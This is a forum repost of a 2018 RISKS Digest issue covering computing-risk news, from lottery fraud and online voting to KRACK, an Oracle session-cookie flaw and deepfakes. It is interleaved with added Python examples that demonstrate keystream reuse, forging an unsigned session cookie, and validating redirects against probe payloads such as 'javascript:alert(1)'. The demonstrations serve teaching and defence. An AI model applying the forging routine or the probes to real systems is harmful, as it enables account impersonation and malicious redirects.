Risks Digest

Discussion in 'Gator Bytes' started by LakeGator, Apr 25, 2015.

    LakeGator
    Risks Digest 30.68

    RISKS List Owner

    May 5, 2018 8:34 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 5 May 2018 Volume 30 : Issue 68

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Iowa Lottery fraud resolved (PGN on NYTimes item)
    "Online voting is impossible to secure. So why are some governments
    using it?" (Porup)
    Lightning Struck Her Home. Then Her Brain Implant Stopped Working (NY Times)
    KRACK Wi-Fi vulnerability can expose medical devices, patient records
    (Charlie Osborne)
    "A critical security flaw in popular industrial software put power plants
    at risk" (Zack Whittaker)
    "Oracle Access Manager security bug so serious it let anyone access
    protected data" (Liam Tung)
    How not to announce a loss of secure information (SMH)
    Why Silicon Valley can't fix itself (The Guardian)
    "Google Maps user? Beware attackers using URL-sharing to send
    you to shady sites" (Liam Tung)
    China's bungled drone display breaks world record (via BBC.com)
    When a stranger takes your face, Facebook failed crackdown on fake accounts
    (WashPo)
    The Era of Fake Video Begins (Franklin Foer)
    Souped-up smartphones, robots to help police fight crime more effectively
    (Straits Times)
    "GitHub says bug exposed some plaintext passwords" (ZDNet)
    "Gaming: The System" (NY Times)
    France seizes France.com from man who's had it since 1994, so he sues
    (Ars Technica)
    Transparent Eel-Like Soft Robot Can Swim Silently Underwater (ACM Technews)
    He Drove a Tesla on Autopilot From the Passenger Seat. The Court
    Was Not Amused. (NYTimes)
    Is My Not-So-Smart House Watching Me? (NYTimes)
    Following the Trail of Online Ads, Wherever It Leads (NYTimes)
    Criminals Used Flying Robots to Disrupt FBI Hostage Operation
    (Fortune)
    Facebook's dating service is a chance to meet the catfisher, advertiser,
    or scammer of your dreams (WashPo)
    Blockchain Will Be Theirs, Russian Spy Boasted at Conference
    (Nathaniel Popper)
    Blockchain is not only crappy technology but a bad vision for
    the future (Kai Stinchcombe, John Levine)
    Keeping your *Twitter* account secure (Gabe Goldberg)
    Against Trendism: how to defang the social media disinformation complex
    (Medium via John Ohno)
    Letter to *Consumer Reports* responding to June article about connected cars
    (Gabe Goldberg)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Thu, 3 May 2018 14:06:09 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Iowa Lottery fraud resolved (NYTimes)

    The Iowa Hot Lotto fraud scandal has now been resolved. A programmer who
    happened to be the info-security head for the Multi-State Lottery
    Association managed to slip in a piece of code into the proprietary system
    that changed the randomness on just three chosen days in the year. This
    enabled a would-be payoff of $14.3M. The collaborators were detected when
    they attempted to collect.
    The Man Who Cracked the Lottery

    This is reminiscent of the Harrah's Tahoe six-slot-machine progressive
    payoff noted way back in RISKS-1.01 (where a shill chosen to collect the
    payoff never showed up, because he had a record and feared exposure [perhaps
    he was in a witness-protection program?], and the more recent Breeder's Cup
    off-track pick-six $3M scam (RISKS-22.33,38-40) -- in which bets on the
    first four races were altered by an insider after those races were over, and
    the next races wildcarded to cover all possible horses, but in a system in
    which the bets were never transmitted until after the fourth race (to save
    bandwidth?).

    The combination of proprietary code that cannot be inspected externally and
    the insider being the IT security person should recall the corresponding
    situation with proprietary election systems that can be hacked or rigged by
    insiders. [And then read Gene Wirchenko's next item! PGN]

    ------------------------------

    Date: Thu, 03 May 2018 09:01:31 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Online voting is impossible to secure. So why are some governments
    using it?" (Porup)

    J.M. Porup, CSO, 2 May 2018
    Online voting is impossible to secure. So why are some governments using it?

    If you thought electronic voting machines were insecure, wait until you meet
    online voting.

    selected text:

    A researcher at the University of Melbourne in Australia, Teague has twice
    demonstrated massive security flaws in the online voting systems used in
    state elections in Australia -- including one of the largest deployments of
    online voting ever, the 2015 New South Wales (NSW) state election, with
    280,000 votes cast online.

    The response? Official complaints about her efforts to university
    administrators, and a determination by state election officials to keep
    using online voting, despite ample empirical proof, she says, that these
    systems are not secure.

    While insecure voting machines have received most of the attention since the
    2016 U.S. presidential election, states and municipalities continue to use
    -- even enthusiastically adopt -- web-based online voting, including 31
    states in the U.S., two provinces in Canada, and two states in Australia.
    Wales in the UK is pushing hard for online voting. The country of Estonia
    uses online voting for its national elections.

    Security researchers point out flaws; election officials get angry and
    ignore security issues that threaten the integrity of the voting
    results. Teague's story repeats itself around the world.

    The NSW state election of 2015 was so insecure that one seat in the upper
    house of the state parliament may have been decided by hacked votes. In
    response to the scandal, the electoral commission went to great lengths to
    avoid transparency regarding the security issues Teague and her team
    reported, and only revealed the true nature of the problem under close
    questioning in state parliament a year later.

    Before the election, the state electoral commission told the Australian
    Broadcasting Corporation (ABC) that "People's vote is completely secret...
    It's fully encrypted and safeguarded, it can't be tampered with." Yet it
    took researchers only a few days to identify fatal flaws in the online
    voting web application that could have easily been used to spy on and even
    modify every single vote cast online, and to do so in an undetectable
    manner.

    The NSW electoral commission initially reported after the election that
    there were no anomalies seen while using the online voting platform, but a
    year later, under questioning in state parliament, admitted that there were,
    in fact, significant anomalies reported by voters. More than 600 voters who
    attempted to verify their votes using a rudimentary telephone-based system
    were unable to do so -- a 10 percent failure rate, enough to call into
    question the voting result of the state election. "That to me is the bottom
    line," Teague says. "The really important thing is that we didn't find out
    the truth at the time."

    ------------------------------

    Date: Fri, 04 May 2018 08:12:36 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Lightning Struck Her Home. Then Her Brain Implant Stopped Working
    (NY Times)

    Lightning Struck Her Home. Then Her Brain Implant Stopped Working.

    ------------------------------

    Date: Tue, 01 May 2018 09:38:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Charlie Osborne)

    Charlie Osborne for Zero Day, 1 May 2018
    KRACK Wi-Fi vulnerability can expose medical devices, patient records | ZDNet

    selected text:

    Medical devices produced by Becton, Dickinson and Company (BD) are
    vulnerable to the infamous KRACK bug, potentially exposing patient records.
    Discovered in October, KRACK, which stands for Key Reinstallation Attack,
    exploits a flaw in the Wi-Fi Protected Access II (WPA2) protocol which is
    used to secure modern wireless networks.

    If exploited, KRACK gives threat actors the key required to join wireless
    networks which would otherwise require a password for authentication. Once
    they have joined, they can snoop on network traffic, perform
    Man-in-The-Middle (MiTM) attacks, hijack connections, and potentially send
    out crafted, malicious network packets.

    In a security bulletin, BD said that successful exploit in a select range of
    products could also lead to patient record changes or exfiltration, as well
    as major IT disruptions.

    ------------------------------
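
    KRACK works by replaying a handshake message so the client reinstalls the session key it is already using; that resets the per-packet nonce, and WPA2's CCMP (AES in counter mode) then encrypts two frames with the same keystream. The script below is an added example, not code from the ZDNet article or from BD, showing why that condition is fatal: the keystream is a stand-in built from HMAC-SHA256 (an assumption made so the script needs only the standard library; real CCMP uses AES-CCM), and the sample frames are constructed. The damage comes from nonce reuse, not from learning the Wi-Fi password.

```python
"""Nonce reuse in a counter-mode cipher, the condition KRACK creates.

Added example, not code from the ZDNet article or from BD. The keystream
is built from HMAC-SHA256 (an assumption for portability, not AES-CCM);
the XOR algebra that leaks plaintext is identical for any stream cipher.
"""
import hashlib
import hmac
import secrets


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream: concatenate PRF(key, nonce || counter) blocks."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        out.extend(block)
        counter += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Stream encryption: ciphertext = plaintext XOR keystream(key, nonce).
    Applying it twice with the same key and nonce decrypts."""
    return xor(plaintext, keystream(key, nonce, len(plaintext)))


def recover_other_plaintext(c1: bytes, known_p1: bytes, c2: bytes) -> bytes:
    """With c1 and c2 under the same key and nonce, c1 XOR c2 = p1 XOR p2, so
    knowing p1 (protocol headers are predictable) yields p2 without the key."""
    n = min(len(c1), len(known_p1), len(c2))
    return xor(xor(c1[:n], c2[:n]), known_p1[:n])


def demo() -> dict:
    key = secrets.token_bytes(16)        # session key; the attacker never learns it
    nonce0 = (0).to_bytes(6, "big")      # packet number right after (re)installation
    nonce1 = (1).to_bytes(6, "big")      # what a correctly advancing counter gives next
    # Constructed sample frames (not real device traffic): a predictable
    # request and a confidential record.
    p1 = b"GET /records?id=4711 HTTP/1.1\r\nHost: pump.hospital.example\r\n\r\n"
    p2 = b"PATIENT 4711 DOSE 2.5 mg/h NEXT 14:00 NOTE allergy: penicillin"
    c1 = encrypt(key, nonce0, p1)
    c2_reused = encrypt(key, nonce0, p2)  # nonce reset by the key reinstallation
    c2_fresh = encrypt(key, nonce1, p2)   # normal operation: fresh nonce per frame
    leaked = recover_other_plaintext(c1, p1, c2_reused)
    garbage = recover_other_plaintext(c1, p1, c2_fresh)
    return {
        "leaked": leaked,
        "leak_is_exact": leaked == p2[: len(leaked)],
        "fresh_nonce_leaks": garbage == p2[: len(garbage)],
    }


if __name__ == "__main__":
    result = demo()
    print("recovered without the key:", result["leaked"])
```

    Only the first frame's contents need to be guessable (DHCP, ARP and HTTP headers usually are); every later frame under the reused nonce then falls out by XOR. The fix in a real stack is the one the WPA2 patches made: never reinstall an already-installed key, and never let the nonce go backwards.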

    Date: Wed, 02 May 2018 08:59:05 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A critical security flaw in popular industrial software put power
    plants at risk" (Zack Whittaker)

    Zack Whittaker for Zero Day, 2 May 2018
    The bug in the industrial control software could leave power and
    manufacturing plants exposed. A severe vulnerability in a widely used
    industrial control software could have been used to disrupt and shut down
    power plants and other critical infrastructure.
    Industrial software used to run power plants was easily hackable

    ------------------------------

    Date: Thu, 03 May 2018 09:15:02 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Oracle Access Manager security bug so serious it let anyone
    access protected data" (Liam Tung)

    By Liam Tung | May 3, 2018 -- 12:42 GMT (05:42 PDT) | Topic: Security
    The moral? Don't roll your own crypto, security researcher tells Oracle.
    Oracle Access Manager security bug so serious it let anyone access protected data | ZDNet

    selected text:

    A bug that Oracle recently patched broke the main functionality of Oracle
    Access Manager (OAM), which should only give authorized users access to
    protected enterprise data.

    However, researchers at Austrian security firm SEC-Consult found a flaw in
    OAM's cryptographic format that allowed them to create session tokens for
    any user, which the attacker could use to impersonate any legitimate user
    and access web apps that OAM should be protecting.

    "What's more, the session cookie crafting process lets us create a session
    cookie for an arbitrary username, thus allowing us to impersonate any user
    known to the OAM."

    ------------------------------
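
    The finding quoted above is that a session cookie could be crafted for an arbitrary username because the cookie's cryptographic format did not stop it. The following is an added example, not OAM's code and not its actual cookie format (the article does not publish that): a token that merely encodes its claims, which anyone can mint, next to one that binds the same claims with HMAC-SHA256 under a server-side key and checks the tag in constant time before parsing anything. The key, claim names and TTL are assumptions.

```python
"""Session cookies: an unauthenticated format next to an HMAC-protected one.

Added example, not OAM's code or cookie format. Claim names, TTL and the
server-side key are assumptions.
"""
import base64
import binascii
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _claims(username: str, ttl: int, now: float) -> bytes:
    return json.dumps({"sub": username, "exp": int(now) + ttl},
                      sort_keys=True, separators=(",", ":")).encode()


# --- Weak: encoding is not authentication --------------------------------
def weak_issue(username: str, ttl: int = 3600, now: Optional[float] = None) -> str:
    return _b64e(_claims(username, ttl, time.time() if now is None else now))


def weak_verify(token: str, now: Optional[float] = None) -> Optional[str]:
    try:
        claims = json.loads(_b64d(token))
    except (binascii.Error, ValueError):
        return None
    if not isinstance(claims, dict):
        return None
    if claims.get("exp", 0) < (time.time() if now is None else now):
        return None
    return claims.get("sub")


def forge_weak(username: str) -> str:
    """The attacker needs no secret: the issuer's steps are public."""
    return weak_issue(username)


# --- Hardened: HMAC-SHA256 over the encoded claims -----------------------
def signed_issue(key: bytes, username: str, ttl: int = 3600,
                 now: Optional[float] = None) -> str:
    payload = _b64e(_claims(username, ttl, time.time() if now is None else now))
    tag = hmac.new(key, payload.encode("ascii"), hashlib.sha256).digest()
    return f"{payload}.{_b64e(tag)}"


def signed_verify(key: bytes, token: str, now: Optional[float] = None) -> Optional[str]:
    payload, sep, tag_b64 = token.partition(".")
    if not sep:
        return None
    try:
        tag = _b64d(tag_b64)
    except binascii.Error:
        return None
    expected = hmac.new(key, payload.encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):   # verify before parsing anything
        return None
    return weak_verify(payload, now)              # integrity established; read claims


def demo() -> dict:
    key = secrets.token_bytes(32)   # server-side secret, never placed in the cookie
    forged = forge_weak("admin")
    legit = signed_issue(key, "alice")
    # Tampering: swap in an "admin" payload but keep alice's tag.
    tampered = forge_weak("admin") + "." + legit.split(".")[1]
    return {
        "weak_accepts_forgery": weak_verify(forged) == "admin",
        "signed_accepts_legit": signed_verify(key, legit) == "alice",
        "signed_rejects_unsigned": signed_verify(key, forged) is None,
        "signed_rejects_tampered": signed_verify(key, tampered) is None,
        "signed_rejects_expired": signed_verify(
            key, signed_issue(key, "alice", ttl=1, now=0), now=10) is None,
    }


if __name__ == "__main__":
    print(demo())
```

    Encrypting the claims instead of encoding them does not change the picture unless the construction also authenticates them; that is the point behind the researcher's "don't roll your own crypto". A vetted authenticated scheme (HMAC as above, or an AEAD mode when the claims must also be hidden) is what a session-token format should be built on.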

    Date: Fri, 4 May 2018 11:08:29 +1000
    From: Dave Horsfall <da...@horsfall.org>
    Subject: How not to announce a loss of secure information (SMH)

    The Commonwealth Bank of Australia, who are in enough trouble as it is with
    major scandals, did not tell its customers that some "tapes" went missing on
    their way to be destroyed.

    Almost 20 million bank account records lost by Commonwealth Bank

    ``The tapes contained customer names, addresses, account numbers and
    transaction details from 19.8 million accounts spanning 2000 to early
    2016. They did not contain passwords, PINs or other data which could be
    used to enable account fraud, CBA said in a statement on Wednesday night
    after BuzzFeed broke the story.''

    So, plenty of account numbers and transaction details etc, but we've got
    nothing to worry about, right? Perhaps they should be reading RISKS...

    Dave Horsfall VK2KFU North Gosford NSW 2250 Australia

    ------------------------------

    Date: Sat, 5 May 2018 11:04:01 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Why Silicon Valley can't fix itself (The Guardian)

    Tech insiders have finally started admitting their mistakes -- but the
    solutions they are offering could just help the big players get even more
    powerful.

    http://www.theguardian.com/news/2018/may/03/why-silicon-valley-cant-fix-itself-tech-humanism

    ------------------------------

    Date: Wed, 02 May 2018 09:02:16 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google Maps user? Beware attackers using URL-sharing to send
    you to shady sites" (Liam Tung)

    Liam Tung, ZDNet, 2 May 2018

    The Google Maps URL-sharing feature allows scammers to send victims to any
    site they choose. Scammers are using the Google Maps URL-sharing feature to
    direct victims not to Maps but any shady website the crooks want. According
    to security firm Sophos, scammers are taking advantage of the fact the URL
    sharing feature in Google Maps isn't an official product and lacks a
    mechanism to report scammy links.

    That's unlike Google's soon-to-be retired URL shortener goo.gl, which can be
    used to conceal links to malware or phishing sites, but also has a simple
    way for recipients to report scam links.

    Google Maps user? Beware attackers using URL-sharing to send you to shady sites | ZDNet

    ------------------------------
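
    The abuse described above is the classic open redirect: a link on a trusted domain whose destination is whatever the attacker put in the sharing parameter. As an added example (not Google's code, and not a description of how the Maps feature works internally), here is a redirect-target validator of the kind a practitioner would put behind any "next"/"share" parameter, with the parser tricks that usually defeat naive checks. The allowed hosts and the probe URLs are constructed assumptions.

```python
"""Validating a user-supplied redirect target. Added example; the allowed
host list and the probe strings are assumptions, not anything from the
article or from Google."""
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = frozenset({"maps.example.com", "www.example.com"})  # assumed own hosts
DEFAULT = "/"


def safe_redirect_target(url, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT) -> str:
    """Return a normalised target if `url` is a same-site path or an http(s)
    URL on an allowed host; otherwise the safe default."""
    if not isinstance(url, str):
        return default
    url = url.strip()
    if any(c in url for c in "\r\n\t\x00"):
        return default  # CRLF/NUL split headers or truncate in some parsers
    # Browsers treat '\' like '/' in http(s) URLs; normalise before parsing
    # so "/\evil.example" is seen for what it is.
    candidate = url.replace("\\", "/")
    parts = urlsplit(candidate)
    if not parts.scheme and not parts.netloc:
        # Relative reference. "//host" and "///host" are scheme-relative
        # URLs to browsers, not paths, so only a single leading slash passes.
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default
    if parts.scheme not in ("http", "https"):   # urlsplit lower-cases the scheme
        return default                           # rejects javascript:, data:, ...
    host = parts.hostname                        # lower-cased, userinfo/port stripped:
    if host is None or host not in allowed_hosts:  # "allowed@evil" resolves to evil
        return default
    # Reassemble from the checked parts only (drops userinfo and any port).
    return urlunsplit((parts.scheme, host, parts.path or "/", parts.query, parts.fragment))


if __name__ == "__main__":
    for probe in ("/maps/place/42", "//evil.example/", "/\\evil.example",
                  "https://maps.example.com@evil.example/", "javascript:alert(1)"):
        print(repr(probe), "->", safe_redirect_target(probe))
```

    Exact host matching (not `endswith` or a substring check) is what keeps `maps.example.com.evil.example` out. Where the product allows it, the stronger design is to accept no URL at all and redirect by an opaque identifier into a server-side table of destinations, which also gives the reporting hook the article says the sharing feature lacks.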

    Date: Thu, 03 May 2018 09:29:21 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: China's bungled drone display breaks world record (via BBC.com)



    Swarm intelligence is complicated to coordinate. "I believe everything
    happens for a reason. Usually, the reason is that somebody screwed up."
    (From Maxine -- the Hallmark Shoebox card character on 23JUN2007).

    ------------------------------

    Date: Sat, 05 May 2018 00:54:41 +0000
    From: Richard M Stein <rms...@ieee.org>
    Subject: When a stranger takes your face, Facebook failed crackdown on fake
    accounts (WashPo)

    When a stranger takes your face: Facebook’s failed crackdown on fake accounts

    Perhaps a biometric supplement would boost authentication accuracy?

    Would be good to learn Facebook user profile photo match rate against the
    FBI's NCIC to test hit/miss rate. How many convicted felons or fugitives use
    Facebook? Given this information, update T&Cs to hedge against
    authentication theft.

    ------------------------------

    Date: Sun, 29 Apr 2018 23:41:00 +0000
    From: geoff goodfellow <ge...@iconia.com>
    Subject: The Era of Fake Video Begins (Franklin Foer)

    Franklin Foer, *The Atlantic*, May 2018 Issue
    The digital manipulation of video may make the current era of fake news seem
    quaint.
    The Era of Fake Video Begins

    EXCERPT:

    In a dank corner of the Internet, it is possible to find actresses from Game
    of Thrones or Harry Potter engaged in all manner of sex acts. Or at least to
    the world the carnal figures look like those actresses, and the faces in the
    videos are indeed their own. Everything south of the neck, however, belongs
    to different women. An artificial intelligence has almost seamlessly
    stitched the familiar visages into pornographic scenes, one face swapped for
    another. The genre is one of the cruelest, most invasive forms of identity
    theft invented in the Internet era. At the core of the cruelty is the acuity
    of the technology: A casual observer can't easily detect the hoax.

    This development, which has been the subject of much hand-wringing in the
    tech press, is the work of a programmer who goes by the nom de hack
    *deepfakes*. And it is merely a beta version of a much more ambitious
    project. One of deepfakes' compatriots told Vice's Motherboard site in
    January that he intends to democratize this work. He wants to refine the
    process, further automating it, which would allow anyone to transpose the
    disembodied head of a crush or an ex or a co-worker into an extant
    pornographic clip with just a few simple steps. No technical knowledge would
    be required. And because academic and commercial labs are developing even
    more-sophisticated tools for non-pornographic purposes -- algorithms that
    map facial expressions and mimic voices with precision -- the sordid fakes
    will soon acquire even greater verisimilitude. The Internet has always
    contained the seeds of postmodern hell. Mass manipulation, from clickbait to
    Russian bots to the addictive trickery that governs Facebook's News Feed, is
    the currency of the medium. It has always been a place where identity is
    terrifyingly slippery, where anonymity breeds coarseness and confusion,
    where crooks can filch the very contours of selfhood. In this respect, the
    rise of deepfakes is the culmination of the Internet's history to date --
    and probably only a low-grade version of what's to come.

    ------------------------------

    Date: Thu, 03 May 2018 17:19:08 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Souped-up smartphones, robots to help police fight crime more
    effectively (Straits Times)

    http://www.straitstimes.com/singapo...s-to-help-police-fight-crime-more-effectively

    "New technology unveiled on Thursday (May 3) will make it easier for the
    police to fight crime and enforce the law.

    "Souped-up smartphones will allow officers to respond faster and more
    effectively to incidents, as well as call up key information on a
    case. Robots on patrol can aid in the detection of suspicious activities,
    and handheld scanners will make it easier to take real-time 3D scans of
    crime scenes to aid in crime solving."

    The article has several photos (showing 3 unique autonomous patrol unit
    configurations) and lists the autonomous patrol unit's h/w specification.

    ------------------------------

    Date: Wed, 02 May 2018 08:55:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "GitHub says bug exposed some plaintext passwords" (ZDNet)

    http://www.zdnet.com/article/github-says-bug-exposed-account-passwords/

    Zack Whittaker for Zero Day, 1 May 2018
    A small but unspecified number of GitHub staff could have seen plaintext
    passwords. GitHub has said a bug exposed some user passwords -- in
    plaintext.

    ------------------------------

    Date: Mon, 30 Apr 2018 09:57:26 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: "Gaming: The System" (NY Times)

    https://www.nytimes.com/2018/04/28/opinion/sunday/gaming-the-system.htm

    ``My gamified life may be nutty and sad, but it doesn't hurt anyone. At
    least that's what I thought until a few months ago, when my new car
    insurance company, Liberty Mutual, invited me to join a program its
    website describes this way: Using a small device that observes your
    driving habits, we'll notice the safe choices you're making on the road
    and reward you for them. The company promised a rate reduction of at
    least 5 percent and up to 30 percent, based on driving performance over a
    three-month period. Best of all, an app would let me track the size of my
    discount in real time.''

    Technology gamifies our lives as consumers -- a dopamine burst sustains
    product interest boosted by a loyalty discount, while data capture
    algorithms gleefully score your profile. Several economics Nobel prizes
    attest to reward incentive influence on consumer behavior. Is gamification
    deployed by social media bots that promote political candidates? Is
    gamification deployed by industries opposing environmental or health
    legislation? Has gamification emerged as a new public health threat
    exploiting the brain's addiction channel?

    See RISKS-29.21 for the first mention of 'gamification' in comp.risks: "The
    brain-imaging experiment showed how the students concentrated and learned
    better when studying was part of a game."

    ------------------------------

    Date: Mon, 30 Apr 2018 00:38:06 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: France seizes France.com from man who's had it since 1994, so he sues
    (Ars Technica)

    http://arstechnica.com/tech-policy/...com-from-man-whos-had-it-since-94-so-he-sues/

    Nice domain you have there. Would be a shame if anything happened to it...

    ------------------------------

    Date: Wed, 2 May 2018 12:31:36 -0400
    From: ACM TechNews <technew...@acm.org>
    Subject: Transparent Eel-Like Soft Robot Can Swim Silently Underwater

    University of California, San Diego (04/24/18) Ioana Patringenaru
    via ACM TechNews, Wednesday, 2 May 2018

    Researchers at the University of California, San Diego and the University of
    California, Berkeley have created a nearly-transparent eel-like robot that
    can swim silently in salt water using artificial muscles. Critical to the
    new technology is the use of the salt water in which the robot swims, to
    generate the electrical forces that propel it. The robot delivers negative
    charges to the water just outside itself, and positive charges inside the
    robot to trigger its muscles to bend, creating the robot's swimming motion.
    The charges carry very little current, making them safe for marine life. The
    technology is an important step toward a future when soft robots can swim in
    the ocean alongside fish and invertebrates without harming them, the
    researchers say.

    http://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-1b1b0x215c58x070332&

    [The technology is fascinating, with lots of opportunities here. Risks?
    Sharks might devour but not digest the robots, heat-sensing creatures
    might cuddle up to them, or even befriend them, or redirect robots that
    are stealthy torpedoes to another target! PGN]

    ------------------------------

    Date: Sun, 29 Apr 2018 17:31:40 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: He Drove a Tesla on Autopilot From the Passenger Seat. The Court
    Was Not Amused. (NYTimes)

    http://www.nytimes.com/2018/04/29/world/europe/uk-autopilot-driver-no-hands.html

    The British man was barred from driving for 18 months after being videotaped
    sitting with his hands behind his head, cruising at 40 miles per hour in
    *heavy* traffic.

    ------------------------------

    Date: Sun, 29 Apr 2018 17:32:05 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is My Not-So-Smart House Watching Me? (NYTimes)

    http://www.nytimes.com/2018/04/27/realestate/is-my-not-so-smart-house-watching-me.html

    Smart-house technology has made it easier to turn on the lights and set the
    thermostat, but sometimes objects go rogue.

    ------------------------------

    Date: Sun, 29 Apr 2018 17:32:55 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Following the Trail of Online Ads, Wherever It Leads (NYTimes)

    http://www.nytimes.com/2018/04/18/technology/personaltech/online-advertising-tracking.html

    Sapna Maheshwari, who covers advertising for The Times, discusses how she
    tracks the online ads that track us.

    ------------------------------

    Date: Fri, 4 May 2018 23:50:14 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Criminals Used Flying Robots to Disrupt FBI Hostage Operation
    (Fortune)

    Criminals have discovered another use for drones -- to distract and spy on
    law enforcement.

    They recently tried to thwart an FBI hostage rescue, Joe Mazel, chief of the
    FBI's operational technology law unit, said this week, according to a report
    by news site Defense One.

    Mazel, speaking at the AUVSI Xponential drone conference in Denver, said
    that criminals launched a swarm of drones at an FBI rescue team during an
    unspecified hostage situation near a large U.S. city, confusing law
    enforcement. The criminals flew the drones at high speed over the heads of
    FBI agents to drive them away while also shooting video that they then
    uploaded to YouTube as a way to alert other nearby criminal members about
    law enforcement's location.

    http://fortune.com/2018/05/04/drone-fbi-hostage-criminals/

    ------------------------------

    Date: Thu, 3 May 2018 19:44:28 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Facebook's dating service is a chance to meet the catfisher,
    advertiser, or scammer of your dreams (WashPo)

    via NNSquad

    http://www.washingtonpost.com/news/...tfisher-advertiser-or-scammer-of-your-dreams/

    The love-seeking singles of Facebook's new dating service, privacy experts
    say, may not be prepared for what they'll encounter: sham profiles,
    expanded data gathering and a new wave of dating fraud. Facebook -- under
    fire for viral misinformation, fake accounts and breaches of tr[sic]

    ------------------------------

    Date: Sun, 29 Apr 2018 17:02:35 -1000
    From: geoff goodfellow <ge...@iconia.com>
    Subject: Blockchain Will Be Theirs, Russian Spy Boasted at Conference
    (Nathaniel Popper)

    Nathaniel Popper, The New York Times, 29 Apr 2018

    http://www.nytimes.com/2018/04/29/technology/blockchain-iso-russian-spies.html

    EXCERPT:

    Russian interest in the technology surrounding virtual currencies, like in
    this crypto-mining operation in Moscow, is growing. Last year, employees of
    Russia's spy agency attended a meeting where international standards for the
    so-called blockchain were discussed. Andrey Rudakov/Bloomberg

    SAN FRANCISCO -- Last year, representatives of 25 countries met in Tokyo to
    work on setting international standards for the blockchain, the technology
    that was introduced by the virtual currency Bitcoin and has ignited intense
    interest in corporate and government circles.

    Some of the technologists at the meeting of the International Standards
    Organization were surprised when they learned that the head of the Russian
    delegation, Grigory Marshalko, worked for the FSB, the intelligence agency
    that is the successor to the KGB.

    They were even more surprised when they asked the FSB agent why the Russians
    were devoting such resources to the blockchain standards.

    ``Look, the Internet belongs to the Americans -- but blockchain will belong
    to us,'' he said, according to one delegate who was there. The Russian added
    that two other members of his country's four-person delegation to the
    conference also worked for the FSB.

    Another delegate who had a separate conversation with the head of the
    Russian group remembers a slightly different wording: ``The Internet
    belonged to America. The blockchain will belong to the Russians.''

    Both of the delegates who recounted their conversations did so on the
    condition of anonymity, because discussions at the International Standards
    Organization are supposed to be confidential. Neither the Russian
    organizations overseeing the delegation to the ISO nor the Russian delegates
    responded to requests for comment.

    ------------------------------

    Date: Sat, 5 May 2018 09:22:23 -0400
    From: "Dave Farber" <far...@gmail.com>
    Subject: Blockchain is not only crappy technology but a bad vision for
    the future (Kai Stinchcombe)

    Kai Stinchcombe, Medium, 5 Apr 2018 [Via Dave's IP distribution]


    Blockchain is not only crappy technology but a bad vision for the future.
    Its failure to achieve adoption to date is because systems built on trust,
    norms, and institutions inherently function better than the type of
    no-need-for-trusted-parties systems blockchain envisions. That's permanent:
    no matter how much blockchain improves it is still headed in the wrong
    direction.

    This December I wrote a widely-circulated article on the inapplicability of
    blockchain to any actual problem. People objected mostly not to the
    technology argument, but rather hoped that decentralization could produce
    integrity. [...]

    ------------------------------

    Date: May 5, 2018 at 1:49:22 PM EDT
    From: "John Levine" <jo...@iecc.com>
    Subject: Blockchain is not only crappy technology but a bad vision for
    the future (Re: Stinchcombe)

    Well, gee, everything he says is self-evidently true.

    Bitcoins remind me of a story from the late chair of the Princeton U.
    astronomy department. In 1950 Immanuel Velikovsky published "Worlds in
    Collision", a controversial best selling book that claimed that 3500 years
    ago Venus and Mars swooped near the earth, causing catastrophes that were
    passed down in religions and mythologies.

    The astronomer was talking to an anthropologist at a party and the book came
    up.

    "The astronomy is nonsense," said the astronomer, "but the anthropology is
    really interesting."

    "Funny," replied the anthropologist, "I was going to say almost the same
    thing."

    Bitcoin and blockchains lash together an unusual distributed database with a
    libertarian economic model. People who understand databases realize that
    blockchains only work as long as there are incentives to keep a sufficient
    number of non-colluding miners active, preventing collusion is probably
    impossible, and that scaling blockchains up to handle an interesting
    transaction rate is very hard, but that no-government money is really
    interesting.

    People who understand economics and particularly economic history understand
    why central banks manage their currencies, thin markets like the ones for
    cryptocurrencies are easy to corrupt, and a payment system needs a way to
    undo bogus payments, but that free permanent database ledger is really
    interesting.

    Not surprisingly, the most enthusiastic bitcoin and blockchain proponents
    are the ones who understand neither databases nor economics.

    ------------------------------

    Date: Thu, 3 May 2018 22:56:28 -0400
